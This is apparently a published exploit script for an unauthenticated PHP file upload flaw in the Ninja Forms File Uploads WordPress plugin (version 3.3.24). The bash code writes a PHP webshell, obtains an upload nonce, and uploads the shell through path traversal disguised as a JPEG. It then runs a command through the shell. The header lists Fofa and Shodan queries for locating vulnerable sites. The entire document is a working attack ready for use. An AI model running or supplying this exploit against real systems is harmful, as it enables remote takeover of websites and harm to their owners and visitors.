# Exploit Title: Ninja Forms Uploads - Unauthenticated PHP File Upload # Date: 2026-04-09 # Exploit Author: Sélim Lanouar (@whattheslime) # Vendor Homepage: https://ninjaforms.com/ # Software Link: https://ninjaforms.com/extensions/file-uploads/ # Version: 3.3.24 # Tested on: WordPress (6.9.3) on Apache and Nginx servers # CVE: CVE-2026-0740 # Fofa Query: body="nfpluginsettings.js?ver=" # Shodan Query: http.html:"nfpluginsettings.js?ver=" # ============================================================================= if [ "$#" -ne 1 ]; then echo "Usage: $0 <target_url>" exit 1 fi target=$1 field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo) file_name=webshell.php echo "[-] Writing webshell in /tmp/$file_name..." echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name echo "[-] Fetching nonce for random field_id $field_id..." nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php" \ -d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce') echo "[+] Got nf_fu_upload nonce: $nonce" echo "[-] Uploading webshell..." response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php" \ -F "action=nf_fu_upload" \ -F "nonce=$nonce" \ -F "form_id=$field_id" \ -F "field_id=$field_id" \ -F "image_jpg=../../../$file_name" \ -F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg") echo "[+] Upload response: $response" command="curl -ks '$target/wp-content/$file_name?cmd=id'" echo "[-] Executing the 'id' command via the uploaded webshell: $command" result=$(eval $command) echo "[+] Command output: $result"